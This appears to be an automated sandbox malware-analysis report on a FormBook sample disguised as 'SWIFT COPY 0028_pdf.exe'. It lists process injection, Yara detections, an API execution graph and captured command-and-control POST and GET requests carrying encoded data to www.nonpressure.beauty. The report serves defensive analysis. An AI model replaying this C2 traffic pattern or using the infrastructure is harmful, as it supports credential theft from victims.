                                                                                  57 | 192.168.2.6 | 50048 | 104.21.4.93 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:35:14.099303007 CET | 828 | OUT | POST /ymqd/ HTTP/1.1
                                                                                  Host: www.nonpressure.beauty
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.nonpressure.beauty
                                                                                  Referer: http://www.nonpressure.beauty/ymqd/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 72 4e 61 61 35 46 2f 63 4c 4a 44 71 64 4f 50 36 6b 68 78 7a 77 35 68 77 6f 7a 6a 68 49 6b 68 30 35 46 33 52 45 39 32 51 4e 54 4c 72 6f 72 68 33 78 30 50 4c 6a 54 48 76 41 49 2b 62 45 61 68 73 70 44 42 6d 74 4d 65 59 73 43 67 63 42 70 63 6a 4f 6d 77 7a 51 69 53 2f 56 43 50 42 36 52 62 37 4b 6c 6a 34 61 6a 34 42 37 78 5a 50 5a 52 32 67 62 54 71 33 4f 33 43 63 4e 35 38 4c 74 2f 6d 55 4c 75 43 30 41 78 79 51 32 34 2b 52 4f 32 35 2f 35 52 66 65 79 6c 4a 6d 55 48 50 5a 31 2f 6e 69 67 4e 64 6e 37 4d 75 32 4e 71 4e 31 6b 56 39 41 4e 34 4e 48 45 77 77 54 7a 4b 42 71 71 74 55 42 38 4a 54 79 41 65 34 53 6e 44 4e 32
                                                                                  Data Ascii: GR54yHZ8=rNaa5F/cLJDqdOP6khxzw5hwozjhIkh05F3RE92QNTLrorh3x0PLjTHvAI+bEahspDBmtMeYsCgcBpcjOmwzQiS/VCPB6Rb7Klj4aj4B7xZPZR2gbTq3O3CcN58Lt/mULuC0AxyQ24+RO25/5RfeylJmUHPZ1/nigNdn7Mu2NqN1kV9AN4NHEwwTzKBqqtUB8JTyAe4SnDN2
                                                                                  Nov 20, 2024 08:35:14.776777029 CET | 680 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:35:14 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Expires: Wed, 20 Nov 2024 07:35:14 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c31b9a5572ad-EWR
                                                                                  Content-Encoding: gzip
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1873&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=828&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  58 | 192.168.2.6 | 50049 | 104.21.4.93 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:35:16.647392988 CET | 852 | OUT | POST /ymqd/ HTTP/1.1
                                                                                  Host: www.nonpressure.beauty
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.nonpressure.beauty
                                                                                  Referer: http://www.nonpressure.beauty/ymqd/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 72 4e 61 61 35 46 2f 63 4c 4a 44 71 63 74 58 36 6d 41 78 7a 78 5a 68 78 73 44 6a 68 43 45 68 77 35 46 37 52 45 34 57 41 4d 6c 62 72 6f 4f 64 33 79 31 50 4c 6d 54 48 76 4b 6f 2b 53 4a 36 68 5a 70 44 64 41 74 4a 65 59 73 43 63 63 42 70 73 6a 4f 52 6b 77 53 79 53 35 59 69 50 44 6b 68 62 37 4b 6c 6a 34 61 6a 38 72 37 78 52 50 5a 41 47 67 62 32 65 30 51 48 43 66 4d 35 38 4c 36 50 6d 51 4c 75 44 6a 41 77 75 36 32 2b 79 52 4f 7a 64 2f 35 67 66 64 34 6c 4a 67 58 33 4f 75 35 50 61 56 6b 65 34 38 79 50 6d 57 56 62 51 56 6f 44 67 61 52 4c 4e 6b 57 67 51 52 7a 49 5a 59 71 4e 55 72 2b 4a 72 79 53 4a 30 31 6f 33 6f 56 61 48 53 6b 48 44 32 44 30 33 76 6e 30 76 59 72 67 49 6d 64 52 67 3d 3d
                                                                                  Data Ascii: GR54yHZ8=rNaa5F/cLJDqctX6mAxzxZhxsDjhCEhw5F7RE4WAMlbroOd3y1PLmTHvKo+SJ6hZpDdAtJeYsCccBpsjORkwSyS5YiPDkhb7Klj4aj8r7xRPZAGgb2e0QHCfM58L6PmQLuDjAwu62+yROzd/5gfd4lJgX3Ou5PaVke48yPmWVbQVoDgaRLNkWgQRzIZYqNUr+JrySJ01o3oVaHSkHD2D03vn0vYrgImdRg==
                                                                                  Nov 20, 2024 08:35:17.312531948 CET | 680 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:35:17 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Expires: Wed, 20 Nov 2024 07:35:17 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c32b7e48c337-EWR
                                                                                  Content-Encoding: gzip
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1452&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=852&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  59 | 192.168.2.6 | 50050 | 104.21.4.93 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:35:19.205195904 CET | 1865 | OUT | POST /ymqd/ HTTP/1.1
                                                                                  Host: www.nonpressure.beauty
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.nonpressure.beauty
                                                                                  Referer: http://www.nonpressure.beauty/ymqd/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 72 4e 61 61 35 46 2f 63 4c 4a 44 71 63 74 58 36 6d 41 78 7a 78 5a 68 78 73 44 6a 68 43 45 68 77 35 46 37 52 45 34 57 41 4d 6c 54 72 6f 62 52 33 30 6d 6e 4c 68 54 48 76 4d 59 2b 66 4a 36 68 41 70 44 56 63 74 4a 61 69 73 48 59 63 44 4b 6b 6a 49 6a 63 77 49 69 53 35 48 79 50 65 36 52 62 75 4b 6c 7a 30 61 69 4d 72 37 78 52 50 5a 43 65 67 53 44 71 30 53 48 43 63 4e 35 38 35 74 2f 6e 33 4c 75 72 7a 41 7a 43 41 31 4f 53 52 4f 54 4e 2f 69 32 44 64 6c 31 4a 69 65 6e 4f 32 35 50 57 4b 6b 65 55 77 79 4d 36 73 56 5a 4d 56 73 57 78 38 4b 66 4a 76 48 78 67 70 71 5a 31 2f 6d 62 67 47 2f 35 76 51 43 2f 31 42 71 58 73 67 65 78 53 69 4d 77 50 69 38 30 37 4f 78 4b 30 2f 31 72 4c 44 44 79 73 4e 6a 5a 79 39 47 56 72 4e 79 76 72 56 6d 74 2b 66 77 51 56 46 6c 4f 42 79 66 6e 54 6d 53 4a 78 49 34 74 32 37 61 71 67 2f 45 63 74 33 62 70 72 4c 43 32 4b 79 6c 6d 43 4e 33 57 51 33 34 37 33 59 50 32 4f 5a 79 4c 70 65 6d 47 7a 6e 70 66 54 6a 61 6c 55 58 37 44 52 53 41 52 52 6e 30 6d 67 77 47 59 63 70 6e [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8= [TRUNCATED]
                                                                                  Nov 20, 2024 08:35:19.855067968 CET | 676 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:35:19 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Expires: Wed, 20 Nov 2024 07:35:19 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c33b6aa5c439-EWR
                                                                                  Content-Encoding: gzip
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1499&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1865&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a
                                                                                  Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh
                                                                                  Nov 20, 2024 08:35:19.855386972 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  60 | 192.168.2.6 | 50051 | 104.21.4.93 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:35:21.755423069 CET | 560 | OUT | GET /ymqd/?GR54yHZ8=mPy66x3IfJKracCH7wZR1aUAlhDvAV8zvELzb8KITnbno7Ubu3OHpx/EILO3OYxVnkt90JirtFkeXZQsCCcXJBbLSRzz4hD+Fif5IhUF/AIFPB6kYSO8O2aHFbYKqoGjWs62c28=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.nonpressure.beauty
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:35:22.429676056 CET | 676 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:35:22 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Expires: Wed, 20 Nov 2024 07:35:22 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c34b793d7291-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=560&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>0


                                                                                  Target ID:0
                                                                                  Start time:02:31:16
                                                                                  Start date:20/11/2024
                                                                                  Path:C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe"
                                                                                  Imagebase:0x920000
                                                                                  File size:1'217'536 bytes
                                                                                  MD5 hash:AA99009FF8C996CCEFD78EB8A4CE1D7E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:02:31:18
                                                                                  Start date:20/11/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe"
                                                                                  Imagebase:0x570000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2315508419.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2314669018.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2316526821.0000000006480000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:02:31:26
                                                                                  Start date:20/11/2024
                                                                                  Path:C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe"
                                                                                  Imagebase:0x6c0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4613219723.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:4
                                                                                  Start time:02:31:28
                                                                                  Start date:20/11/2024
                                                                                  Path:C:\Windows\SysWOW64\rasautou.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\rasautou.exe"
                                                                                  Imagebase:0x290000
                                                                                  File size:15'360 bytes
                                                                                  MD5 hash:DFDBEDC2ED47CBABC13CCC64E97868F3
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4613350413.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4602405101.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4613399783.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:6
                                                                                  Start time:02:31:42
                                                                                  Start date:20/11/2024
                                                                                  Path:C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe"
                                                                                  Imagebase:0x6c0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4613324935.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:9
                                                                                  Start time:02:31:54
                                                                                  Start date:20/11/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff728280000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true


                                                                                    Execution Graph

                                                                                    Execution Coverage:4%
                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                    Signature Coverage:6.9%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:66
                                                                                    execution_graph 93836 923742 93837 92374b 93836->93837 93838 9237c6 93837->93838 93839 9237c8 93837->93839 93840 923769 93837->93840 93841 9237ab DefWindowProcW 93838->93841 93842 991e00 93839->93842 93843 9237ce 93839->93843 93844 923776 93840->93844 93845 92382c PostQuitMessage 93840->93845 93846 9237b9 93841->93846 93891 922ff6 16 API calls 93842->93891 93847 9237d3 93843->93847 93848 9237f6 SetTimer RegisterWindowMessageW 93843->93848 93850 991e88 93844->93850 93851 923781 93844->93851 93845->93846 93852 9237da KillTimer 93847->93852 93853 991da3 93847->93853 93848->93846 93855 92381f CreatePopupMenu 93848->93855 93906 964ddd 60 API calls _memset 93850->93906 93856 923836 93851->93856 93857 923789 93851->93857 93888 923847 Shell_NotifyIconW _memset 93852->93888 93860 991da8 93853->93860 93861 991ddc MoveWindow 93853->93861 93854 991e27 93892 93e312 331 API calls Mailbox 93854->93892 93855->93846 93881 93eb83 93856->93881 93864 991e6d 93857->93864 93865 923794 93857->93865 93867 991dcb SetFocus 93860->93867 93868 991dac 93860->93868 93861->93846 93864->93841 93905 95a5f3 48 API calls 93864->93905 93870 92379f 93865->93870 93871 991e58 93865->93871 93866 991e9a 93866->93841 93866->93846 93867->93846 93868->93870 93872 991db5 93868->93872 93869 9237ed 93889 92390f DeleteObject DestroyWindow Mailbox 93869->93889 93870->93841 93893 923847 Shell_NotifyIconW _memset 93870->93893 93904 9655bd 70 API calls _memset 93871->93904 93890 922ff6 16 API calls 93872->93890 93877 991e68 93877->93846 93879 991e4c 93894 924ffc 93879->93894 93882 93eb9a _memset 93881->93882 93883 93ec1c 93881->93883 93907 9251af 93882->93907 93883->93846 93885 93ec05 KillTimer SetTimer 93885->93883 93886 93ebc1 93886->93885 93887 993c7a Shell_NotifyIconW 93886->93887 93887->93885 93888->93869 93889->93846 93890->93846 93891->93854 93892->93870 93893->93879 93895 925027 _memset 93894->93895 94050 924c30 93895->94050 
93898 9250ac 93900 993d28 Shell_NotifyIconW 93898->93900 93901 9250ca Shell_NotifyIconW 93898->93901 93902 9251af 50 API calls 93901->93902 93903 9250df 93902->93903 93903->93838 93904->93877 93905->93838 93906->93866 93908 9251cb 93907->93908 93928 9252a2 Mailbox 93907->93928 93929 926b0f 93908->93929 93911 9251e6 93934 926a63 93911->93934 93912 993ca1 LoadStringW 93915 993cbb 93912->93915 93914 9251fb 93914->93915 93917 92520c 93914->93917 93916 92510d 48 API calls 93915->93916 93922 993cc5 93916->93922 93918 925216 93917->93918 93919 9252a7 93917->93919 93945 92510d 93918->93945 93954 926eed 93919->93954 93924 925220 _memset _wcscpy 93922->93924 93958 92518c 93922->93958 93926 925288 Shell_NotifyIconW 93924->93926 93925 993ce7 93927 92518c 48 API calls 93925->93927 93926->93928 93927->93924 93928->93886 93968 93f4ea 93929->93968 93931 926b34 93977 926b4a 93931->93977 93935 926adf 93934->93935 93938 926a6f __wsetenvp 93934->93938 94012 92b18b 93935->94012 93937 926ab6 _memcpy_s 93937->93914 93939 926ad7 93938->93939 93940 926a8b 93938->93940 94011 92c369 48 API calls 93939->94011 93941 926b4a 48 API calls 93940->93941 93943 926a95 93941->93943 94002 93ee75 93943->94002 93946 92511f 93945->93946 93947 991be7 93945->93947 94024 92b384 93946->94024 94033 95a58f 48 API calls _memcpy_s 93947->94033 93950 92512b 93950->93924 93951 991bf1 93952 926eed 48 API calls 93951->93952 93953 991bf9 Mailbox 93952->93953 93955 926f00 93954->93955 93956 926ef8 93954->93956 93955->93924 94039 92dd47 48 API calls _memcpy_s 93956->94039 93959 925197 93958->93959 93960 991ace 93959->93960 93961 92519f 93959->93961 93963 926b4a 48 API calls 93960->93963 94040 925130 93961->94040 93965 991adb __wsetenvp 93963->93965 93964 9251aa 93964->93925 93966 93ee75 48 API calls 93965->93966 93967 991b07 _memcpy_s 93966->93967 93970 93f4f2 __calloc_impl 93968->93970 93971 93f50c 93970->93971 93972 93f50e std::exception::exception 93970->93972 93980 94395c 93970->93980 93971->93931 93994 946805 
RaiseException 93972->93994 93974 93f538 93995 94673b 47 API calls _free 93974->93995 93976 93f54a 93976->93931 93978 93f4ea 48 API calls 93977->93978 93979 9251d9 93978->93979 93979->93911 93979->93912 93981 9439d7 __calloc_impl 93980->93981 93990 943968 __calloc_impl 93980->93990 94001 947c0e 47 API calls __getptd_noexit 93981->94001 93982 943973 93982->93990 93996 9481c2 47 API calls 2 library calls 93982->93996 93997 94821f 47 API calls 8 library calls 93982->93997 93998 941145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93982->93998 93985 94399b RtlAllocateHeap 93985->93990 93993 9439cf 93985->93993 93987 9439c3 93999 947c0e 47 API calls __getptd_noexit 93987->93999 93990->93982 93990->93985 93990->93987 93991 9439c1 93990->93991 94000 947c0e 47 API calls __getptd_noexit 93991->94000 93993->93970 93994->93974 93995->93976 93996->93982 93997->93982 93999->93991 94000->93993 94001->93993 94004 93f4ea __calloc_impl 94002->94004 94003 94395c __crtGetStringTypeA_stat 47 API calls 94003->94004 94004->94003 94005 93f50c 94004->94005 94006 93f50e std::exception::exception 94004->94006 94005->93937 94016 946805 RaiseException 94006->94016 94008 93f538 94017 94673b 47 API calls _free 94008->94017 94010 93f54a 94010->93937 94011->93937 94013 92b1a2 _memcpy_s 94012->94013 94014 92b199 94012->94014 94013->93937 94014->94013 94018 92bdfa 94014->94018 94016->94008 94017->94010 94019 92be0d 94018->94019 94023 92be0a _memcpy_s 94018->94023 94020 93f4ea 48 API calls 94019->94020 94021 92be17 94020->94021 94022 93ee75 48 API calls 94021->94022 94022->94023 94023->94013 94025 92b3c5 _memcpy_s 94024->94025 94026 92b392 94024->94026 94025->93950 94026->94025 94027 92b3b8 94026->94027 94028 92b3fd 94026->94028 94034 92bb85 94027->94034 94029 93f4ea 48 API calls 94028->94029 94031 92b407 94029->94031 94032 93f4ea 48 API calls 94031->94032 94032->94025 94033->93951 94035 92bb9b 94034->94035 94038 92bb96 _memcpy_s 94034->94038 94036 991b77 94035->94036 94037 
93ee75 48 API calls 94035->94037 94037->94038 94038->94025 94039->93955 94041 92513f __wsetenvp 94040->94041 94042 925151 94041->94042 94043 991b27 94041->94043 94044 92bb85 48 API calls 94042->94044 94045 926b4a 48 API calls 94043->94045 94046 92515e _memcpy_s 94044->94046 94047 991b34 94045->94047 94046->93964 94048 93ee75 48 API calls 94047->94048 94049 991b57 _memcpy_s 94048->94049 94051 924c44 94050->94051 94052 993c33 94050->94052 94051->93898 94054 965819 61 API calls _W_store_winword 94051->94054 94052->94051 94053 993c3c DestroyIcon 94052->94053 94053->94051 94054->93898 94055 998eb8 94059 96a635 94055->94059 94057 998ec3 94058 96a635 84 API calls 94057->94058 94058->94057 94060 96a66f 94059->94060 94065 96a642 94059->94065 94060->94057 94061 96a671 94091 93ec4e 81 API calls 94061->94091 94063 96a676 94070 92936c 94063->94070 94065->94060 94065->94061 94065->94063 94068 96a669 94065->94068 94066 96a67d 94067 92510d 48 API calls 94066->94067 94067->94060 94090 934525 61 API calls _memcpy_s 94068->94090 94071 929384 94070->94071 94088 929380 94070->94088 94072 994cbd __i64tow 94071->94072 94073 994bbf 94071->94073 94074 929398 94071->94074 94081 9293b0 __itow Mailbox _wcscpy 94071->94081 94075 994bc8 94073->94075 94076 994ca5 94073->94076 94092 94172b 80 API calls 3 library calls 94074->94092 94075->94081 94082 994be7 94075->94082 